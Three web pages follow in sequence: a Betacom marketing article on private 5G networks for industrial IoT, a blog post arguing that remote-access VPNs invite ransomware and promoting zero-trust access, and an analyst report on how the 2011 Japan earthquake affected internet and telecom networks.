We’ll explore the technologies available right now that enable industrial IoT (IIoT) technology, and those just on the horizon. With this basic knowledge we hope you’ll be better able to wrap your head around what it will take you to get you from here… to that perfect automated future.
Understanding the technologies
Technology is always changing and evolving. It’s hard to keep up. So, let’s first define the different technologies you hear about and how they each address IIoT.
Wired connectivity is a more mature technology, but it can be expensive and bulky. You are essentially cabling every single device and component together. So space, flexibility and complexity are key considerations.
Local area networks (LANs), wide area networks (WANs) and low power wide area networks (LPWANs) link devices together to a computer network within a specific area, building or group of buildings. This technique allows you to hard wire some devices but also employ other types of wireless connectivity for others. Having limited space, too much complexity, and limited bandwidth are all downsides of using these solutions for advanced IIoT applications.
Most of us confuse these terms because they’re so closely related. Wireless is the generic term for device connectivity using radio waves. It’s an umbrella term that covers cellular, Wi-Fi, and low power technologies like Bluetooth. Each method connects to these radio waves in slightly different ways. We’re going to concentrate on two of these – Wi-Fi and cellular – and try to simplify our definition. Think about how your various devices connect and consume data.
Let’s talk Wi-Fi first. Wi-Fi is a standard for short-distance wireless communication. It uses unlicensed spectrum that is shared by all Wi-Fi users, making it easy to access and cost-effective. Wi-Fi is available in most consumer devices, and the latest version of Wi-Fi, called Wi-Fi 6, can reach impressive speeds. The downside of Wi-Fi is actually caused by some of the same things that make it so great. Because it uses shared spectrum, and because so many devices use Wi-Fi, it can easily have interference issues or become congested. In an industrial IoT environment where business-critical applications need to work 100% of the time, Wi-Fi simply cannot be relied on.
Cellular connectivity generally comes from mobile carriers (AT&T, Verizon, T-Mobile) accessing radio waves via their vast network of cell towers. Because of their size and power, the range for cellular can be quite broad (cities, towns, etc.). Today’s cellular offerings are generally described as 4G and 5G. What’s the difference?
4G means 4th generation of cellular technology. 4G was developed when the first iPhone came out with capabilities for data intensive applications like video.
You’ll hear comparisons of each generation in terms of:
1) speed (simply how fast is the connection?)
2) bandwidth (how big is the figurative pipe feeding the connection?)
3) latency (what are the lags or delays in the connection?)
Next-gen 5G cellular technology has been designed specifically for IIoT – to improve connectivity between billions of devices. It has the ability to deliver the sophisticated connectivity needed to safely accommodate autonomous vehicles, and to support data-intensive virtual reality applications. With 5G, the smart city of the future may be just around the corner with real-time surveillance for public safety, fast delivery of real-time medical data for connected health services, Artificial Intelligence to drive smart robots that learn as they operate – the list is truly endless. Blink twice and we’ll be talking about 6G and beyond.
Now, add to these tech-generations the concept of public or private networks and the questions regarding how you pay and who owns the data.
Public 5G vs. Private 5G
Public 5G is what you’re most likely familiar with from the news or TV commercials where one mobile carrier claims that their 5G network is so much better than the others. Verizon, AT&T and T-Mobile have spent billions of dollars in licensing to operate their cellular networks over very specific public-spectrum radio waves. They also recently spent millions more to upgrade their cell towers from 4G to 5G capabilities. The result is better coverage and higher speeds on your phones – especially if you’re outdoors where the radio signal is strong. The costs for these licenses and upgrade is, of course, passed along to you and me, the consumers.
So what about private 5G? While that network buildout was happening, the US government decided to set aside a big chunk of spectrum (radio waves) specifically for enterprise use (in many cases without needing a license) in order to foster business innovation. This is the foundation for private 5G.
Now, each enterprise can set up a network behind their private firewall, keeping access to the network and all their data secure. Parts of the network can be outdoors, like in a stadium or a warehouse yard, but the location is local and specific to the enterprise. Bandwidth and latency issues are minimized without any external interference. So private 5G networks leverage the advantages of wireless technology but in a controlled and secure environment that assures high reliability and low costs.
Private 5G networks enable these real-life advantages:
- Delivery of ultra-low latency connectivity with superior bandwidth, both indoors and in otherwise hard-to-reach places outdoors
- Coverage that is targeted, local and precise, enabling complex IIoT connectivity
- Mobility of connection that is perfect for automated guided vehicles and mobile robots
- Network configuration that can sit behind an enterprise firewall the keeps all data secure and in the company’s control
Now that we understand the tech-lingo better, let’s examine what is needed to implement IIoT, what planning is still in order and what obstacles we must overcome before we can begin to realize what’s possible.
Enabling Industry 4.0: What are the challenges?
Industry 4.0 is really just another buzz word for applying IIoT automation to industry. As we look at how to make that a reality, some challenges still exist. What are they and how close are we to navigating our way around them?
Complexity of deployment
We talked about speed, bandwidth, and latency. The more devices we have to connect the more potentially complex our network solution to accommodate them. Which applications are business critical, which are not (or less so)? What are the physical limitations of the equipment, the operating space, and the range of connectivity? For instance, IoT for fleet management may require maximum range capabilities.
This ‘Internet of everything’ we talk about doesn’t quite yet exist. Everything does NOT work in harmony. There may be obstacles connecting existing fixed equipment hardware or sensors with other devices for environmental controls or predictive maintenance. Perhaps upgrades are available or can be budgeted for in the future, or can they continue to work independently?
IoT sensors, set-up, connectivity
A thorough understanding of how IoT devices are set up must be put into the planning of an efficient network. For instance, warehouse sensors that read barcodes or RFIDs can’t function properly if there is interference of any kind. This could be caused by geography, physical space, storage racks, or moving elements like vehicles, humans, or mobile robots.
Cost and mindset for change
It’s one thing to imagine a perfect IIoT operation, and quite another to make it a reality. A lot of people and processes have to come together for a common goal to finance such investments. This may take years of planning and budgeting, which can be especially hard when the technology itself is changing so quickly. Yet when done right, integrating building and warehouse management solutions for instance, can improve your bottom line for years to come. And the improved efficiencies and safety of airports and factories can have a tremendous impact on cities and the economy.
Productivity and safety
Digital transformation makes the promise that industry will operate more productively. But people and machines can be at odds with each other. For instance, imagine an automated vehicle as a key component of your modern manufacturing production line. But what happens if a human gets in the way of the vehicle sensor? Will it be able to stop in time? Can the system handle the interruption in the workflow and recover in a safe yet efficient way? With more integration of automated devices and tools comes greater security risk — in more ways than one.
Data security and control
This brings us to cybersecurity, a hot topic for just about any business or industry. Enterprises cannot afford undue risk — to their intellectual property, their infrastructure, their assets, or their bottom line! Not only do you want to control access to data, devices, and applications, you want to own it. This is one way in which private 5G networks are ideal for IIoT, because, as we’ve mentioned you own and control the network and your data. And think about it, the only topic possibly hotter that cybersecurity right now is big data. Data itself has become a valuable commodity to industry for what it can tell you, and how it can help you to forge the future of your business.
One last challenge to address and that’s staffing — technical staffing to be precise. So maybe you’re ready to build that perfect network and enable IIoT wireless technology. But how do you go about building it? It’s unlikely you have current staff who are well versed and current on IoT network management and infrastructure. Who manages it? Should you hire and train in-house staff or find a provider who can build and manage it for you?
Putting private 5G at work in key industries
A few industry sectors are already finding ways to embrace IIoT through private 5G networks. Let’s talk about the best applications for each of these three front-runners.
Industry 4.0 is driving manufacturers to support factory floor robotics, devices like cameras and scanners, and a whole lot of data. Private 5G networks are finally able to offer a secure connection without interruption and at an affordable price. Early adopters in manufacturing include the automotive sector and those industries hoping to address recent supply chain and staffing issues that came to the fore with COVID. The IIoT use cases include predictive maintenance, modern automation, fleet management, machine learning, improved productivity, safety compliance, production scalability and flexibility. Here are some specifics:
IIoT technology can enable the accurate tracking and monitoring of everything from raw materials and tools through final production and shipment of goods.
Modern predictive maintenance devices help you to improve and maintain the health of your production line equipment with condition-based monitoring and artificial intelligence.
By integrating collaborative robotics into your production line, you can achieve a level of superior agility and precision previously unattainable with manual labor alone.
IIoT integration can provide employees access to systems and interfaces that deliver production controls, analytics, and a better understanding of what machines are doing — all for the well-oiled plant of the future.
Warehouses like those operated by Amazon and Walmart are offering new opportunities for jobs and growth in both urban and rural America. IIoT innovations have made these enterprises more expansive and complex, introducing new ways to improve inventory control, just-in-time delivery, and operations efficiency.
Smart warehousing needs more than accurate knowledge of what’s on the shelf. Modern IIoT inventory solutions address inventory tracking from supplier, to shelf, to truck and trailer routes and customer delivery.
Automated Guided Vehicles
Integrating automated vehicles with human-interface product picking and shipping operations can speed production efficiency.
Rugged Device Connectivity
IIoT network solutions can prioritize critical on-premises worker communications anywhere on the warehouse campus without interference to or from on-floor operational computers and equipment.
Airports were hit hard with COVID and are only starting to bounce back. And even before the pandemic, the challenge of delivering superior passenger experiences while also addressing operational efficiencies, security concerns and rising costs was top-of-mind for airlines and airports. IIoT connectivity has helped to address these industry-specific use cases above and below the wing:
Baggage and Cargo Handling
Automated asset tracking and scanners for baggage and cargo handling streamline airport and passenger operations from departure kiosks to destination arrival terminals.
Streamline Passenger Journey
With well-connected wayfinding, arrival and departure airline signage, ticketing kiosks and even retail operations, airport operations can be optimized for a streamlined, and touchless passenger experience.
Private networks allow IIoT devices to be integrated and delivered with optimal security. CCTV, security scanners, access control and even plane telemetry data and controls all work together to deliver safe domestic and international travel.
A roadmap to IIoT innovation
It’s obvious by now that private 5G is an important enabler of IIoT. But the road is not always clearly marked and easy to implement. Early adopters are paving the way for those who choose to follow. Are you one of them? Are you ready to embrace the possibilities of IIoT innovation in your enterprise? (For those ready to create an IIoT-ready network of your own, check out these resources: Your Private 5G Network Planning Checklist — for Warehouse and for Airports).
The good news: Scalability is built in.
With the right professionals to help you plan, design, and install a private 4G/5G network you’ll be able to scale as you grow. You can build a networking solution that meets the demands of your business now, and that also progressively enables future advanced technology as it becomes available. Managed service providers like Betacom can help.
And with 5G as a Service, Betacom will help you manage the daily operations of your network, backed 24x7x365 by their Security and Service Operations Center that address any and all connectivity and security issues, leaving your team free to focus on your business.
The time is now for Industry 4.0. And private 5G networks are enabling automation for ‘smart’ enterprises of the future. What are you waiting for? Get started with your 5G enabled IIoT operation now. Contact us.
To learn more about private 5G networks check out these resources: | <urn:uuid:149fda16-775d-418f-81e4-c51e16e167d4> | CC-MAIN-2024-38 | https://www.betacom.com/news/how-5g-enables-industrial-iot-wireless-technologies/ | 2024-09-13T08:58:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651510.65/warc/CC-MAIN-20240913070112-20240913100112-00392.warc.gz | en | 0.937379 | 3,130 | 3.015625 | 3 |
VPN has gained widespread attention since 2018. YouTubers promote them as one of the safest tools to use to browse the internet safely and anonymously. But while there are advantages to using a VPN, there are also disadvantages.
According to a Computer Weekly article, Travelex, a foreign exchange company, was recently hit by Sodiokibi ransomware, which ultimately disabled the foreign company's IT systems on New Year's Eve. The attack took place when the company accidentally forgot to cover its Pulse Secure VPN servers.
Unfortunately, it is becoming more of a common issue as VPNs are now a target of cybercriminals.
Outdated protocols lead to cyberattacks.
Back in the day, when remote access VPNs were necessary for a growing digital society, they were fantastic tools. The concept of remote access from anywhere in the world was game-changing. IT teams introduced VPN’s at a time when most apps were running in the on-prem data centre, which was skilfully secured with a few network security appliances.
However, as the digital world is growing faster, more internal apps have switched to the cloud. Remote access VPNs need servers to be exposed to the internet, and users need to be moved onto the corporate network through static tunnels that drive holes through firewalls. Moreover, the same set of technology made to protect businesses and multinational corporations is now susceptible to modern malware and ransomware attacks.
But how does it happen?
It is becoming more of a common trend of systematic cyberattacks that leave VPNs vulnerable. Most recently, Medium.com had published an article about the Sodinokibi ransomware incident and how it was implemented via a VPN. From that article, here are a few points that show the average process for how malware can be introduced to a network through a VPN vulnerability:
- Cybercriminals use a technique where they scan the internet for unpatched VPN servers
- When remote access to the network is archived (this excludes a valid password and username)
- Attacks have the advantage of viewing logs and cached passwords in plain text
- Domain admin access is gained
- Subtle lateral movements take place across the entire network
- Multifactor authentication (MFA) and endpoint security are then disabled
- Ransomware (such as Sodinokibi) gets moved to network systems
- The company is susceptible to ransomware
Negative effects of VPN
Many traditional organisations believe that remote-access VPNs are necessary. In some cases, they may very well be. But, often enough, VPNs are the gateway to opening networks to the internet, and as a result, there is an increased risk to most businesses. And here’s why:
- The patching process is often too slow or neglected - recalling and even allocating time to patch VPN server is painstakingly difficult.
- Placing users on the network - For VPNs to work, networks must be discoverable. Unfortunately, this means that exposure to the internet opens the organisation to cyber attacks.
- Lateral risk at exponential scale - once on a network, malware can grow and spread laterally, and regardless of efforts to perform network segmentation. Furthermore, this can lead to the takedown of other security technologies, for example, MFA and endpoint security.
- The business' reputation - customers, will develop a sense of trust from a company, especially regarding how an organisation manages their customers' data. The ongoing widespread news of ransomware attacks poses a threat to the organisation and has a detrimental impact on the brand’s reputation.
A newer, safer approach
Since there has been an increase in the negative impacts of VPN, it has led to new research in finding an alternative solution. It has also reported that, by the year 2023, 60% of enterprises will phase out most of their remote access virtual private networks (VPNs) in favour of zero-trust network access (ZTNA).
For businesses considering alternative methods, such as ZTNA, it is best to keep these points in mind when positioning it to your executive:
Reduce business risk - using ZTNA allows for access to specific business applications without the need for network access. Besides, there is no infrastructure ever exposed. By using ZTNA, it removes the visibility of services and apps on the internet.
Reduce costs - Aside from the fact that ZTNA can reduce business risk, it can also reduce cost. ZTNA is often depicted as a fully cloud-delivered service. It also means that there are no servers to buy, patch, or manage, and this is not limited to just a VPN server. The entirety of a VPN inbound gateway can now be smaller or wholly removed.
Deliver a better user experience - Given the increased availability of cloud ZTNA services compared to limited VPN inbound appliance gateways, remote users are given a faster and more seamless access experience regardless of application, device and even location.
If you are thinking about replacing your remote access VPN, then check out gend.co/netskope, we’d be happy to provide a full trial and demo to show you how to move from a VPN based service safely.
Want to stay ahead of the competition when it comes to security? Check out 10 Critical Security Projects and How Netskope Can Help. | <urn:uuid:a0df611a-6b33-4862-be78-00d92cdc2e21> | CC-MAIN-2024-38 | https://www.gend.co/blog/vpns-the-good-the-bad-and-the-ugly | 2024-09-14T15:27:37Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.38/warc/CC-MAIN-20240914125424-20240914155424-00292.warc.gz | en | 0.95881 | 1,089 | 2.8125 | 3 |
The 8.9-magnitude earthquake in Japan rocked the northeastern portion of the coast. The quake was the strongest to hit Japan in at least a century, sending a tsunami that flooded northern towns and also reached portions of the United States, including Hawaii. The quake was followed by a 7.1-magnitude aftershock.
Impact on Internet connectivity:
Japan’s Internet performance seemed to have emerged largely unscathed, but concerns continue for the telecommunications infrastructure as the country struggles to meet power demands in a state-of-emergency. Internet intelligence firm Renesys revealed that only 100 out of the 6000 network prefixes out of Japan were temporarily out of service following the quake and tsunami. Other carriers around the region reported congestion and drops in traffic due to follow-on effects of the quake, but most websites are up and operational, and the Internet is available to support critical communications.
Another indication of the health of the Internet is traffic handled by the Japan Internet Exchange, which saw a 25Gb/s drop in traffic directly after the quake but this had picked up by the end of the day.
Overall traffic through another exchange point, JPNAP (a Layer 2 Internet exchange for large traffic volume), registered a 10% drop over its historical rates from the previous two weeks, which would suggests only minor impact.
What these statistics don’t show is the surge in traffic that follows any major event. So while the infrastructure is now delivering traditional traffic volumes, the fact there is apparently no spike in traffic usage is already an indication of some impact.
The situation may worsen however. Damage on Pacnet’s EAC cable and Pacific Crossing’s PC-1, (APCN2 is also confirmed as impacted) was the cause of the initial impact on Internet performance. Based on experience from the Taiwan quake, it is possible that lingering damage to fibers, repeaters, and landing station equipment may continue to generate new problems over the coming days and weeks, even in cable systems that survived the initial event. At present international and regional connectivity out of Japan remains intact.
Impact on telecommunications operators:
NTT East, who suffered the most damage, has raised the number of impacted lines from an initial number of 340,000 phone lines and 130,000 broadband fibre links, to 879,500 phone lines and 475,400 fibre links. Further disruptions are expected due to ongoing power outages. So far, the number of impacted mobile base stations has remained around 11,000,
but if power outages continue, there is also the likelihood that others will fail as well as they run out of backup power.
Many of the major data centres in Japan have escaped damage. A round up of potential damage to data centres by ZDNet Japan found that most are operating normally, including those that are hosting cloud services. The only exception seems to be NTT Communications’ facilities in the Tohoku region, which are no longer online as the region has lost fibre and IP VPN connectivity.
The situation is vastly different from the 26 December 2006 earthquake off the coast of Taiwan, when up to 6 regional cable systems were damaged, resulting a widespread disruption for both business and Internet services in the region.
Social media and measures by operators to help:
Japan’s operators have all implemented measures to help its users share and distribute information following the earthquake. While phone lines were congested with callers seeking information from friends and family, Japan’s operators quickly set up other forms of communications to enable users to find critical information about family and friends. All four mobile operators—NTT DoCoMo, KDDI, Softbank and E-Mobile—set up dedicated messaging boards for users to share information instead of relying on voice calls. The four mobile operators also made available a service that allows users to check whether a particular phone number is still active and on the network.
NTT East, which operates the fixed line infrastructure in the worst hit regions, waived fees for public payphones in 17 prefectures. Google also made available its Person Finder application, first introduced following the New Zealand earthquake last month, as well as a dedicated crisis response site with the latest information on the situation in Japan.
Meanwhile, individual users are turning to social media sites such as Facebook and Twitter for information and communication. FON, a company which manages a large network of wi-fi hotspots, is opening up its 500,000 hotspots in Japan to web surfers for free until the country’s state of emergency comes to an end. Residents are posting videos of the quake on the CitizenTube channel on YouTube and using the service to reach out to friends and families across the world.
For information relating to the telecommunications market in Japan, see:
This post written by Lisa Hulme-Jones, BuddeComm Senior Analyst | <urn:uuid:a051c408-a7ea-4a7b-bb13-1775ecdcb733> | CC-MAIN-2024-38 | https://circleid.com/posts/20110316_quake_damage_in_japan | 2024-09-17T02:13:19Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651722.42/warc/CC-MAIN-20240917004428-20240917034428-00092.warc.gz | en | 0.953535 | 991 | 2.78125 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.